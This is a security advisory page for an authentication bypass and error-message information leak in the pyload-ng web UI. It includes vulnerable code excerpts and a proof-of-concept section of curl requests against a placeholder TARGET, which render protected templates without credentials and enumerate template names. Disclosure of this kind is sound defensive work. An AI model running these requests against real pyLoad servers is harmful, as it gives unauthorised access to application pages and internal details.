Open-Source Security Intelligence

Know every vulnerability
before it knows you.

DevGuard continuously monitors your dependencies and alerts you when CVEs like this one affect your stack — with real-time threat intelligence built for developers.

Search

GHSA-j92p-c242-7hfx

MediumCVSS 5.3 / 10
Published Oct 9, 2026·Last modified Oct 9, 2026
Affected Components(105)
PyPI logopyload-ng
0.5.0a9.dev641
PyPI logopyload-ng
0.5.0a5.dev539
PyPI logopyload-ng
0.5.0b3.dev21
1 / 35
Description

Summary

The /web/<path:filename> route in src/pyload/webui/app/blueprints/app_blueprint.py renders Jinja2 templates without any authentication requirement. Every equivalent direct route (/logs, /settings, /queue, /dashboard, etc.) is protected by @login_required, but the underlying templates for all of these pages are accessible unauthenticated via this endpoint. Combined with an exception attribute typo in src/pyload/webui/app/handlers.py (exc.desc instead of exc.description), internal Jinja2 variable names are leaked in HTTP 500 response bodies to unauthenticated callers. An attacker can also enumerate all valid template names by observing 200 vs 500 response differentiation.

Details

Bug 1 — Missing authentication on /web/<path:filename>

File: src/pyload/webui/app/blueprints/app_blueprint.py, lines 32–36

@bp.route("/web/<path:filename>", endpoint="web")
def render(filename):                          # ← no @login_required
    mimetype = mimetypes.guess_type(filename)[0] or "text/html"
    data = render_template(filename)
    return flask.Response(data, mimetype=mimetype)

Every other sensitive route in the same file is protected:

@bp.route("/logs", ...)
@login_required("LIST")       # protected

@bp.route("/settings", ...)
@login_required("SETTINGS")  # protected

@bp.route("/files", ...)
@login_required("DOWNLOAD")  # protected

The /web/<path:filename> route has no such decorator, allowing any unauthenticated HTTP client to render arbitrary templates by supplying their filename in the URL path.

Bug 2 — Exception attribute typo causes internal details in error responses

File: src/pyload/webui/app/handlers.py, lines 12–20

def handle_exception_error(exc):
    try:
        code = exc.code
        desc = exc.desc          # BUG: attribute does not exist on standard exceptions
    except AttributeError:       # always raised — falls here for every exception
        code = 500
        desc = exc               # raw exception object assigned to desc
    message = f"Error {code}: {desc}"   # str(exc) embedded in response body
    return render_template("error.html", messages=[message]), code

exc.desc does not exist on standard Python or Jinja2 exceptions. The AttributeError branch is always taken for template rendering failures. desc is set to the raw exception object, and str(exc) is embedded in the HTML response body returned to the unauthenticated caller. For a UndefinedError this produces 'conf' is undefined. For TemplateNotFound it produces the template filename.

PoC

Tested against pyload-ng develop branch (0.5.0b3.dev), default install, no authentication cookies or credentials used in any request.

Test 1 — Unauthenticated page render confirmed (HTTP 200)

curl -si http://TARGET:8000/web/logs.html | grep "HTTP\|title"

Test 2 — System info page with sensitive field labels rendered unauthenticated

html

<dt><b>Python Version:</b></dt>
<dt><b>OS Platform:</b></dt>
<dt><b>Installation Folder:</b></dt>
<dt><b>Config Folder:</b></dt>```

Test 3 — Internal Jinja2 variable name leaked in HTTP 500 body (unauthenticated)
```curl -si http://TARGET:8000/web/settings.html | grep "HTTP\|Error"
HTTP/1.1 500 INTERNAL SERVER ERROR
<p><b>Error 500: 'conf' is undefined</b></p>```
Test 4 — Template enumeration via response code differentiation
```curl -o /dev/null -sw "%{http_code}\n" http://TARGET:8000/web/logs.html
curl -o /dev/null -sw "%{http_code}\n" http://TARGET:8000/web/info.html
curl -o /dev/null -sw "%{http_code}\n" http://TARGET:8000/web/dashboard.html
curl -o /dev/null -sw "%{http_code}\n" http://TARGET:8000/web/settings.html
curl -o /dev/null -sw "%{http_code}\n" http://TARGET:8000/web/queue.html
curl -o /dev/null -sw "%{http_code}\n" http://TARGET:8000/web/collector.html
curl -o /dev/null -sw "%{http_code}\n" http://TARGET:8000/web/filemanager.html
curl -o /dev/null -sw "%{http_code}\n" http://TARGET:8000/web/nonexistent_xyz.html
200  ← logs.html        (exists, renders without auth)
200  ← info.html        (exists, renders without auth)
200  ← dashboard.html   (exists, renders without auth)
500  ← settings.html    (exists, missing auth context — leaks 'conf' is undefined)
500  ← queue.html       (exists, missing auth context)
500  ← collector.html   (exists, missing auth context)
500  ← filemanager.html (exists, missing auth context)
500  ← nonexistent_xyz  (does not exist — same 500, no differentiation on miss)```

###Impact
An unauthenticated remote attacker can:

Render application page templates without any credentials, bypassing the access control model enforced on all direct routes
Access the system information page (info.html) exposing field structure for Python version, OS platform, pyLoad version, installation folder, config folder, and WebUI port — values are populated via JS but field labels confirm application structure
Access the full log viewer UI (logs.html) and download dashboard (dashboard.html) without authentication
Extract internal Jinja2 template variable names from HTTP 500 response bodies ('conf' is undefined, etc.)
Enumerate all valid template filenames by observing 200 vs 500 response codes

The access control inconsistency is the core issue: the authentication model enforced on direct routes is completely bypassed via the /web/<path:filename> endpoint. Any future template that renders sensitive data server-side would be immediately exposed to unauthenticated access through this route.
Upload your SBOM

Upload your own SBOM in CycloneDX 1.6 or higher (JSON) directly here to check your vulnerabilities.

Risk Scores
Base Score
5.3

The vulnerability can be exploited over the network without needing physical access. It is easy for an attacker to exploit this vulnerability. An attacker does not need any special privileges or access rights. No user interaction is needed for the attacker to exploit this vulnerability. The impact is confined to the system where the vulnerability exists. There is a low impact on the confidentiality of the information.

Threat Intelligence
4.9

Exploitation attempts have been detected. Elevated vigilance and prompt remediation are advised.

EPSS
N/A

Probability that this vulnerability will be exploited in the wild within the next 30 days.

Exploit
Not available

We did not find any exploit available. Neither in GitHub repositories nor in the Exploit-Database.

Related Vulnerabilities
  • CVE-2026-75597
    Alias
  • EUVD-2026-95911
    Alias

Browse More

Scan your project

Continuously monitor your dependencies and get alerted when vulnerabilities like this one affect your stack.

Checkout DevGuard